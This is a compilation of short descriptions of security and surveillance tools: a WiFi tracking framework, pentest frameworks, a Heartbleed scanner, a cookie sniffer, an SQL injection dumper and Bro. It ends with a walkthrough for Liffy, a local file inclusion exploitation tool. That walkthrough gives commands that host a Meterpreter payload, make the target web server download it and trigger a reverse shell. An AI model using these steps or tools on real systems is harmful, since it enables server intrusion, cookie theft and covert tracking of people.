Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data.

Snoopy consists of four components:
  • Client software (aka Snoopy Drone software)
  • Server software
  • Web interface
  • Maltego transforms

Plug-ins
Plug-ins consist of two parts:
  • Back-end (data providing) part, written in Python
  • Front-end (displaying) part, written in JavaScript (optional)

Requirements
  • Ubuntu 12.04 LTS 32bit online server
  • One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
  • A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.


sb0x-project - A simple and Lightweight framework for Penetration testing


sb0x-project is A Lightweight Framework for PenTesting Written in Python


Platforms:
  • Linux
  • BSD
  • "Or Unix System"

Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables


A simple scan in bash to extract sites from a bing search and check if is vulnerable.


ByWaf - Web Application Penetration Testing Framework


ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds some important additions, including:
  • Loading and selecting plugins.
  • Getting and setting global and per-plugin options.
  • Additional methods exposing functionality to the plugins.
  • Backgrounding jobs, ending running jobs and querying job status.
  • Loading scripts from the the command-line or within the interpreter.
  • Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:
The Wafterpreter API encompasses methods used by both the plugins as well as the Wafterpreter’s own methods; this allows for plugins to refining its behavior by assigning their own methods in their place.

Utility methods are time-saving shortcuts; while the API methods are the preferred way to change the interpreter’s behavior and to perform queries for jobs.
  • filename_completer(): a utility method and API that when given a set of starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. This parameters to this method are supplied to completion methods, which can in turn pass them to this method.
  • get_job(): this utility method retrieves a Futures instace from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
  • finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
  • set_prompt(): an API method for setting the prompt to reflect a new plugin name.
  • get_history_item(): an API method returning the command history.
  • save_history(): an API method for saving the command history to a file.
  • load_history(): an API method for loading the command history from a file.
  • clear_history(): an API method for clearing the command history.
  • load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

WebCookiesSniffer - Capture Web site cookies


WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

RCEer - Simple Remote Command Execution scanner


Simple Remote Command Execution scanner written in Python 2.7

Bro - Passive Open-Source Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expression arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database


SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

Functions
  • SQL Injection
  • Operation System Function
  • Dump Database
  • Extract Database Schema
  • Search Columns Name
  • Read File (read only)
  • Create File (read only)
  • Brute Table & Column

Liffy - Local File Inclusion Exploitation Tool


Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.
http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn
curl --silent http://target/vuln/7ka0tqsq.php